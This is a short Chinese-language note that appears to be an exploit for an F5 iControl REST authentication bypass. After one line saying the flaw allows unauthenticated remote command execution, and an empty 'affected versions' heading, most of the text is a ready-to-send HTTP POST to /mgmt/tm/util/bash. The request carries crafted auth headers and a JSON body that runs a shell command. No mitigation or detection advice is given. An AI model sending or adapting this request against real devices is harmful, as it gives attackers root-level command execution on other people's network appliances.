该漏洞允许远程未经身份验证的绕过iControl REST ,执行任意命令。
影响版本:
POST /mgmt/tm/util/bash HTTP/1.1 Host: F5地址 Content-Length: 45 Connection: Keep-Alive,X-F5-Auth-Token Cache-Control: max-age=0 X-F5-Auth-Token: a Content-Type: application/json Authorization: Basic YWRtaW46aG9yaXpvbjM= { "command":"run", "utilCmdArgs":"-c id" }